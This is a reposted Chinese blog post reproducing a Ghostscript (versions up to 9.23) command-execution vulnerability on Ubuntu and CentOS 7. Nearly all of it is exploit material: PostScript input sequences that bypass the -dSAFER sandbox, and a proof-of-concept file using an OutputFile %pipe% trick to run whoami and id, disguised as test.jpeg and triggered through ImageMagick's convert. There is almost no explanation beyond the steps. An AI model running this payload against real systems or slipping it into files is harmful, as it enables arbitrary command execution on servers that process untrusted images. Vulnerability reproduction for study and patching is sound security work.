ghostscript 远程命令执行漏洞复现

最新推荐文章于 2024-04-26 09:35:19 发布

andiao1218

最新推荐文章于 2024-04-26 09:35:19 发布

阅读量532

点赞数

文章标签：开发工具

原文链接：http://www.cnblogs.com/sch01ar/p/9523155.html

版权

影响的版本 <= 9.23（全版本、全平台）

Ubuntu

开启 ghostscript

sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%whoami) currentdevice putdeviceprops
showpage

执行结果

poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%whoami) currentdevice putdeviceprops

用 vim 将 poc 保存为 test.jpeg，执行

sch01ar@ubuntu:~$ convert test.jpeg 1.jpg

执行结果，1.jpg 随便写

Centos 7

开启 ghostscript

[root@sch01ar ~]# gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

依次输入

legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

执行结果

poc

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

转载于:https://www.cnblogs.com/sch01ar/p/9523155.html

andiao1218

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ghostscript 远程命令执行漏洞复现

影响的版本 <= 9.23（全版本、全平台）Ubuntu开启 ghostscriptsch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null依次输入legal{ null restore } stopped { pop } iflegalmark /O...
复制链接

扫一扫